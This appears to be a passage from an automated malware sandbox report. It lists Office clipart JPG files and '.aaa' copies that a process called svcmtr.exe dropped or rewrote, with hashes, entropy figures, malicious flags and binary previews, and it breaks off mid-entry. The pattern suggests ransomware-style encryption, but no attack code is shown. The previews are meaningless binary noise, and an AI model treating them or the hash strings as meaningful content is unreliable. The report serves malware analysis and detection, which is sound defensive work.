                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..R..B..GA..LO=.......Yh.v'K..7E..f..RH..*m..>|.].oj....-...i.~...e...0w............K.cB.....}}#.4......-.I.K..A#*...."...\...n..D2Gt.7Z.Q.l2.v?.;W.4J...f....A\..2....DI.kCm.(.....-.X...cDv.-.N...E......fp_g%...s..q9X]...@.~3bh..7.5rR....h...E..&B..O..0....:d.].....a...ZpV.7..h.O&]...<-.p...".6*O..L....{._...A.t......mr.,...=.(.Xc.C.,.Xh.\.Bp....Wh.g.......}.Y./.;...,z...!...,....l.._..2..Z1F.....+1....x.,:s._.Cx.vE."..dk4.~.<5Y">.0&.v.&\.'>..T..RW$.Q....y.......Q'"...TeQ../.....)....M....IVE}.....J.y...:./....,..`..%}s...N/x..w.V.b....I|D-....p.g9...<.. %.q-o...=.z.H.qb.....

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):18110
                                                                                                                          Entropy (8bit):7.987013547214024
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GafZB5uJUKclfTtrI6VLnV37W0QpXUrjU+IooeeNhJTMktQmoIbL5UM:GETLKcHNVJrq+ceejUjIbL5UM
                                                                                                                          MD5:96DFD73D9630CD966CE487AE9CA742FF
                                                                                                                          SHA1:21CF0741FF3A4D89228EE462187AFA685D15DD20
                                                                                                                          SHA-256:90A9F48918FD14830389B25FA4AF315ADD57638969B422A35826E066A6E84346
                                                                                                                          SHA-512:6912B477DAF9028148046BB056CB5E21B0BF096BEDA750AA49008A7813A6489C150380D8552A9433FBE59AA3325001592829C7F01A4E39222CBE5DD2442E2D06
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..^....CTxt.M....>.E..z.+....ynl....6{.........@._?...).:..o...ke....7VF.A..M....<{.......|k6."E..U..jh.P.-.;.^..rJ.K..:....OU[. KN..n%......8....9....s0K..{.j.k~ .]!.h....~..P1.......e...F. .H*...#./T.....*.....1...4S.z...*OuY.O~.....Y=..........N.P....wmK...Fx5rj...G.c.z....L$u]Z..4..O.......&.=.R..+..3"he.+...A...{..&@.....$.e.1u.M..E....C5..v.>.,.G.0...C..0?.L:>.VQo...8:.^.@.,...EV..fr.c..;..gla...".7.+d&.M..t.=..(%.........L.C.)..}TB7X>A..Nm....mN...APH.....o%N..;8J.F?.L....^...M!Xm...T.g:..~..R`.0DjIr..J\D.j.r....n..{Q/gg.kI._..?B..L.4.Ld}.E....H....7.#~bCD...H.

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):18110
                                                                                                                          Entropy (8bit):7.987013547214024
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GafZB5uJUKclfTtrI6VLnV37W0QpXUrjU+IooeeNhJTMktQmoIbL5UM:GETLKcHNVJrq+ceejUjIbL5UM
                                                                                                                          MD5:96DFD73D9630CD966CE487AE9CA742FF
                                                                                                                          SHA1:21CF0741FF3A4D89228EE462187AFA685D15DD20
                                                                                                                          SHA-256:90A9F48918FD14830389B25FA4AF315ADD57638969B422A35826E066A6E84346
                                                                                                                          SHA-512:6912B477DAF9028148046BB056CB5E21B0BF096BEDA750AA49008A7813A6489C150380D8552A9433FBE59AA3325001592829C7F01A4E39222CBE5DD2442E2D06
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..^....CTxt.M....>.E..z.+....ynl....6{.........@._?...).:..o...ke....7VF.A..M....<{.......|k6."E..U..jh.P.-.;.^..rJ.K..:....OU[. KN..n%......8....9....s0K..{.j.k~ .]!.h....~..P1.......e...F. .H*...#./T.....*.....1...4S.z...*OuY.O~.....Y=..........N.P....wmK...Fx5rj...G.c.z....L$u]Z..4..O.......&.=.R..+..3"he.+...A...{..&@.....$.e.1u.M..E....C5..v.>.,.G.0...C..0?.L:>.VQo...8:.^.@.,...EV..fr.c..;..gla...".7.+d&.M..t.=..(%.........L.C.)..}TB7X>A..Nm....mN...APH.....o%N..;8J.F?.L....^...M!Xm...T.g:..~..R`.0DjIr..J\D.j.r....n..{Q/gg.kI._..?B..L.4.Ld}.E....H....7.#~bCD...H.

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):27806
                                                                                                                          Entropy (8bit):7.99330090540058
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GlENcYgld6/32wq3rZun+7odwdoMffuLlz9x52:8Y8dqq38+7oSBf3
                                                                                                                          MD5:BEE4BE4A30A7BA827E3E4DF9FB31D83E
                                                                                                                          SHA1:944895D8AA2911EE51C6947566109DDD2DF5154B
                                                                                                                          SHA-256:BC0B7C1714649031BD65ABE4A882B400D0060771C03538C3073261051E6B1315
                                                                                                                          SHA-512:566343088C8A1F0A5AD43A4624092262EB01B7130EA344211AD4DE0AF2E0B903CC4B6516B7CF34412CA4AB44602AAEA35D5AE026B91A94A66856FDA5E2F2652A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..p.v.K.d..i./.b.j...;..Q.(./H.....X....[.....#.2....j.....\..y.........Spd..s..<a.^>. .M.Z.%.-.x...D.S..`:;..m...)w..I/....J..V.aX...o.[..41a$.G..p......By..a.[}.#g8S.J..s|...AO".R.......e.c...^..|..M.|."..E...s;.c.%...#!....{.u."RZ....X]\....%S....K......R..N".uQ.S/.q..g1...QW..o1G@f...;.Z.o...S.h.+".........b.M.Kam..>..^v..A....yb.T.w..r....B..q<.._...v....!B.0.....Pj..M+E5...^.....].@....e.a..."....Y.B/.C.p..E@.Sfc3g.....\g.(..K.....c.......(,`..~...N.....7.!..C.n..B.X.l...&.KE..A....i..e:*.4Q.!w.~..(XM.fF.z..b.b......V..\..A..#y...b.a.0.Y......M..Jw-...w.G.

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):27806
                                                                                                                          Entropy (8bit):7.99330090540058
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GlENcYgld6/32wq3rZun+7odwdoMffuLlz9x52:8Y8dqq38+7oSBf3
                                                                                                                          MD5:BEE4BE4A30A7BA827E3E4DF9FB31D83E
                                                                                                                          SHA1:944895D8AA2911EE51C6947566109DDD2DF5154B
                                                                                                                          SHA-256:BC0B7C1714649031BD65ABE4A882B400D0060771C03538C3073261051E6B1315
                                                                                                                          SHA-512:566343088C8A1F0A5AD43A4624092262EB01B7130EA344211AD4DE0AF2E0B903CC4B6516B7CF34412CA4AB44602AAEA35D5AE026B91A94A66856FDA5E2F2652A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..p.v.K.d..i./.b.j...;..Q.(./H.....X....[.....#.2....j.....\..y.........Spd..s..<a.^>. .M.Z.%.-.x...D.S..`:;..m...)w..I/....J..V.aX...o.[..41a$.G..p......By..a.[}.#g8S.J..s|...AO".R.......e.c...^..|..M.|."..E...s;.c.%...#!....{.u."RZ....X]\....%S....K......R..N".uQ.S/.q..g1...QW..o1G@f...;.Z.o...S.h.+".........b.M.Kam..>..^v..A....yb.T.w..r....B..q<.._...v....!B.0.....Pj..M+E5...^.....].@....e.a..."....Y.B/.C.p..E@.Sfc3g.....\g.(..K.....c.......(,`..~...N.....7.!..C.n..B.X.l...&.KE..A....i..e:*.4Q.!w.~..(XM.fF.z..b.b......V..\..A..#y...b.a.0.Y......M..Jw-...w.G.

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):29758
                                                                                                                          Entropy (8bit):7.993461548416619
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GzmbR8Aoc2+m+coITqoe3y/PP/3YJoquQRScr9R:tbeAf2E2TLznPgJdAcr9R
                                                                                                                          MD5:6EAFB38303E2DF441788F1FCDD1047B7
                                                                                                                          SHA1:34FAC677422D33A79AEDA435868ACFD52D2B92CA
                                                                                                                          SHA-256:74A182B6A7B37C46249DB421DBA0D9EB83F6CE1FAF59DE1E445A97602688358B
                                                                                                                          SHA-512:D670E4EFBA88D1F31C14037194375D12D16A5CB862B6709E7D217E4A039956FEA937A02E54E1DA363702E72A967FDD0F58AFB71250C28A917653E9E0C8AA3821
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..}..j...r0z_j..M..r..4O....c.....W...l.n}.qQ.r.$7..........$.3xv..]/.ah..3c ........?.j....,...Q. ...c.....G.....B..S&..w[.o}...nw.H.4..V.%'...".'.....[.9..]...h...P.[6....<..!j.7.2......J..Y7 .`.FK...i...J....s7.7El.<'...|"E).f..J...E.....^r.>..A.`...n%.X.~..."9.j.8-R9..j&.....o......C..k..H....c..x...T.....r>.;...$.8..n....y..e-gr....ouDIc.|."Oc....bs...m@..............x.r)`,=.?..#P|..Z..5a..Y...N.....O.#...u>.......DI.X..G|...V.H1:>.t..i.2.v.X..>. .j..$..b..%.K..*a..]....o..Q..2..*...+1D.-...AZr....\.i1N..O......V..._.....6S'......V....5qxU"..s.f.n..2.!H......

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):29758
                                                                                                                          Entropy (8bit):7.993461548416619
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GzmbR8Aoc2+m+coITqoe3y/PP/3YJoquQRScr9R:tbeAf2E2TLznPgJdAcr9R
                                                                                                                          MD5:6EAFB38303E2DF441788F1FCDD1047B7
                                                                                                                          SHA1:34FAC677422D33A79AEDA435868ACFD52D2B92CA
                                                                                                                          SHA-256:74A182B6A7B37C46249DB421DBA0D9EB83F6CE1FAF59DE1E445A97602688358B
                                                                                                                          SHA-512:D670E4EFBA88D1F31C14037194375D12D16A5CB862B6709E7D217E4A039956FEA937A02E54E1DA363702E72A967FDD0F58AFB71250C28A917653E9E0C8AA3821
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..}..j...r0z_j..M..r..4O....c.....W...l.n}.qQ.r.$7..........$.3xv..]/.ah..3c ........?.j....,...Q. ...c.....G.....B..S&..w[.o}...nw.H.4..V.%'...".'.....[.9..]...h...P.[6....<..!j.7.2......J..Y7 .`.FK...i...J....s7.7El.<'...|"E).f..J...E.....^r.>..A.`...n%.X.~..."9.j.8-R9..j&.....o......C..k..H....c..x...T.....r>.;...$.8..n....y..e-gr....ouDIc.|."Oc....bs...m@..............x.r)`,=.?..#P|..Z..5a..Y...N.....O.#...u>.......DI.X..G|...V.H1:>.t..i.2.v.X..>. .j..$..b..%.K..*a..]....o..Q..2..*...+1D.-...AZr....\.i1N..O......V..._.....6S'......V....5qxU"..s.f.n..2.!H......

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3966
                                                                                                                          Entropy (8bit):7.924079327722471
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgt3WhlBY629vF2K8+p6ZWvhSfKWs4CsAA2cEotYA1oBvhFP9sj8Tq42y:cztoDVB12CkiK3FjcEhzBKj8242X1Dg
                                                                                                                          MD5:40D25F675F7D05F5787C99A0D0993172
                                                                                                                          SHA1:8913379C416AC874D79E23E9DC7DB5DB765B908B
                                                                                                                          SHA-256:4CE82A1B4226BFE153EC2429219F361C272370CF737C5029A76DB792DABD796C
                                                                                                                          SHA-512:8E05B280A01D7F0A2E756FF24FF095D12ACA314A852CCE58948CC768D37932AF6E511C4750E694FE4800EE8AE2753DA6F8E63C17355B587316053B8995B2C536
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...HN|es..[Q.m.S.h.......+. .>xUJcP..p.H.ch&..0.5$K06jYg.#..&y2."......7.|....=.].?|.(..6y...,....Bg.C..p...$..k...R....=c.M..U...>9.........X..<.;...Cq..Tj..I%y.O)..^.b4.jS....k.... .....\%...,Z.yD...-;..R.w....f]..ul^..F$...p.gB.B.......o....~O..^alOXk..../.9h...._.$...N.#.4h+@.?..P.2*..`y6\_.J.B..8..Xw...a$-.F...&... k.%I...!..b.zj[s...9.sG;..j<...S..>)8?CN=........f...."...$~......(..DP.u...J.f9..1/.z. ..).5T...... ,.Hc.Ox>U..<.<.....V..*.....$l.J..%..wSIjs6.....iz)..?..4m...r..#W.-.F.~.qD..."..b3..6Fd.f.Q.%...Y.ZWq.e.{.c..:/a.d~>........l........ND.jb.....N#..}0..g...\e.

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3966
                                                                                                                          Entropy (8bit):7.924079327722471
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgt3WhlBY629vF2K8+p6ZWvhSfKWs4CsAA2cEotYA1oBvhFP9sj8Tq42y:cztoDVB12CkiK3FjcEhzBKj8242X1Dg
                                                                                                                          MD5:40D25F675F7D05F5787C99A0D0993172
                                                                                                                          SHA1:8913379C416AC874D79E23E9DC7DB5DB765B908B
                                                                                                                          SHA-256:4CE82A1B4226BFE153EC2429219F361C272370CF737C5029A76DB792DABD796C
                                                                                                                          SHA-512:8E05B280A01D7F0A2E756FF24FF095D12ACA314A852CCE58948CC768D37932AF6E511C4750E694FE4800EE8AE2753DA6F8E63C17355B587316053B8995B2C536
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...HN|es..[Q.m.S.h.......+. .>xUJcP..p.H.ch&..0.5$K06jYg.#..&y2."......7.|....=.].?|.(..6y...,....Bg.C..p...$..k...R....=c.M..U...>9.........X..<.;...Cq..Tj..I%y.O)..^.b4.jS....k.... .....\%...,Z.yD...-;..R.w....f]..ul^..F$...p.gB.B.......o....~O..^alOXk..../.9h...._.$...N.#.4h+@.?..P.2*..`y6\_.J.B..8..Xw...a$-.F...&... k.%I...!..b.zj[s...9.sG;..j<...S..>)8?CN=........f...."...$~......(..DP.u...J.f9..1/.z. ..).5T...... ,.Hc.Ox>U..<.<.....V..*.....$l.J..%..wSIjs6.....iz)..?..4m...r..#W.-.F.~.qD..."..b3..6Fd.f.Q.%...Y.ZWq.e.{.c..:/a.d~>........l........ND.jb.....N#..}0..g...\e.

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):34366
                                                                                                                          Entropy (8bit):7.993988451381542
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GZbXGPRYCZrmy5zlvzwOn64MN2SiPYGDTHd6XHM6sv:eSPefal8+Mgr96XHSv
                                                                                                                          MD5:71AD561C86C201C0762F2EB17188CEEF
                                                                                                                          SHA1:805D9720C79B5F7B47ABAA8A1D32BC4E75ADB198
                                                                                                                          SHA-256:EC4CE7277E0A6738CF725B779E55ADA122218CC820CF5697ED533863B23B4E08
                                                                                                                          SHA-512:C28859735ACE4D670E819272309E05EA12F0FF7F8642296EDF3373FB53ECC4158E4EC961F138ED0E82F3413263222711AFFC0988D22062319A24F16EA5FB3921
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..N~...RPY...#(\..........4.j.O.\..P%8=.L.u..M..j.._ii.x..f......OU...3Y7P.....K.$.M..K....|..Ls2.K=..&a:..........7]..wx.H......Y..........y..GzK..?j.k....x...#...~]..\u.}!......G#2....<"...Q{.R.".0Ux..x^.M....%..x..U...+.C.u2.1.....Sq...d..N.0..,...r.;.1Q/.@:.....J.U@....xA../C._li.....Ms/.......H.=@..[...1'.4....[w....n....>.c..'Y.....pc...Q~KT4...#..".....nw.V.J...Z.........*uls5]..K+t.o......x.U+.:.....yb.......f+r\........t..........MK8_T.A.b...<Y.]-.s3...0."...b.m.....t..:QeD..K.Dy-......b,.\+.......6...R....t...t.s6.N*. ....K.H3..T..s............&H.]v:...pL*..>..K...

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):34366
                                                                                                                          Entropy (8bit):7.993988451381542
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GZbXGPRYCZrmy5zlvzwOn64MN2SiPYGDTHd6XHM6sv:eSPefal8+Mgr96XHSv
                                                                                                                          MD5:71AD561C86C201C0762F2EB17188CEEF
                                                                                                                          SHA1:805D9720C79B5F7B47ABAA8A1D32BC4E75ADB198
                                                                                                                          SHA-256:EC4CE7277E0A6738CF725B779E55ADA122218CC820CF5697ED533863B23B4E08
                                                                                                                          SHA-512:C28859735ACE4D670E819272309E05EA12F0FF7F8642296EDF3373FB53ECC4158E4EC961F138ED0E82F3413263222711AFFC0988D22062319A24F16EA5FB3921
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..N~...RPY...#(\..........4.j.O.\..P%8=.L.u..M..j.._ii.x..f......OU...3Y7P.....K.$.M..K....|..Ls2.K=..&a:..........7]..wx.H......Y..........y..GzK..?j.k....x...#...~]..\u.}!......G#2....<"...Q{.R.".0Ux..x^.M....%..x..U...+.C.u2.1.....Sq...d..N.0..,...r.;.1Q/.@:.....J.U@....xA../C._li.....Ms/.......H.=@..[...1'.4....[w....n....>.c..'Y.....pc...Q~KT4...#..".....nw.V.J...Z.........*uls5]..K+t.o......x.U+.:.....yb.......f+r\........t..........MK8_T.A.b...<Y.]-.s3...0."...b.m.....t..:QeD..K.Dy-......b,.\+.......6...R....t...t.s6.N*. ....K.H3..T..s............&H.]v:...pL*..>..K...

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):41598
                                                                                                                          Entropy (8bit):7.994576922557622
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GEVXqhw0a2i4ZYn5qq8BSYCAlXWdbQvgwnedaAxw4aDKyXwgbJgL+Zv4B+sqivc:LXq+0a54ZYnD8BVkleYdxoDKs8CG5Q
                                                                                                                          MD5:14699279B25BCBB2F7F7C842305B85BE
                                                                                                                          SHA1:DA9A9D8F65D3428B61E995BC54C561BE9AE81138
                                                                                                                          SHA-256:C40BE22C454C0F027921ECAFF8C8E7465A5F6890FEC39916338A58EB8C421965
                                                                                                                          SHA-512:09F78F2071E821892905B920D740DBB9CD0F24303AA2F5AB729A766341346A431A805F78B114A2B158FE245DFE7625A4F694EEB6824929E2BD01A72D2AE4EFA6
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..B[E.".9 .....o7...q.r.m.......M..8.j.T...DA....e.#g..mo4....1.]...F.2.....h.....3.1(jmP..ml.6~...xv...Y..x.=...|.Y.|>.|E..&@...sm.....b.9.gd7.........[.l...,ZD)U0..fBS@..Z...ASm2..$r.....j............1.2#.X~.8.%....m...EG......T!q....t...J..l.......+L..a+..cO..?.f5Z...54....e.N...X..S.x^.N....~........Fbv.5..sU.T....1G!1.*Y9FoSr.... dz....k.9.+...d.)n.Lt...G8..x.J..<EE.D3.n..o....KFN...n.C.J.g1.....i.$...\..5...<.A....&....a......6.)r._+.........B..{......n...=c...b.:..V..,.c......F...}.)..mR ..\..{.I.C.......'.....4[..i...^.?.`.M^..^....#.'m......X(.rO......3Lw...\..y}.9

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):41598
                                                                                                                          Entropy (8bit):7.994576922557622
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GEVXqhw0a2i4ZYn5qq8BSYCAlXWdbQvgwnedaAxw4aDKyXwgbJgL+Zv4B+sqivc:LXq+0a54ZYnD8BVkleYdxoDKs8CG5Q
                                                                                                                          MD5:14699279B25BCBB2F7F7C842305B85BE
                                                                                                                          SHA1:DA9A9D8F65D3428B61E995BC54C561BE9AE81138
                                                                                                                          SHA-256:C40BE22C454C0F027921ECAFF8C8E7465A5F6890FEC39916338A58EB8C421965
                                                                                                                          SHA-512:09F78F2071E821892905B920D740DBB9CD0F24303AA2F5AB729A766341346A431A805F78B114A2B158FE245DFE7625A4F694EEB6824929E2BD01A72D2AE4EFA6
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..B[E.".9 .....o7...q.r.m.......M..8.j.T...DA....e.#g..mo4....1.]...F.2.....h.....3.1(jmP..ml.6~...xv...Y..x.=...|.Y.|>.|E..&@...sm.....b.9.gd7.........[.l...,ZD)U0..fBS@..Z...ASm2..$r.....j............1.2#.X~.8.%....m...EG......T!q....t...J..l.......+L..a+..cO..?.f5Z...54....e.N...X..S.x^.N....~........Fbv.5..sU.T....1G!1.*Y9FoSr.... dz....k.9.+...d.)n.Lt...G8..x.J..<EE.D3.n..o....KFN...n.C.J.g1.....i.$...\..5...<.A....&....a......6.)r._+.........B..{......n...=c...b.:..V..,.c......F...}.)..mR ..\..{.I.C.......'.....4[..i...^.?.`.M^..^....#.'m......X(.rO......3Lw...\..y}.9

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):51070
                                                                                                                          Entropy (8bit):7.996071574801994
                                                                                                                          Encrypted:true
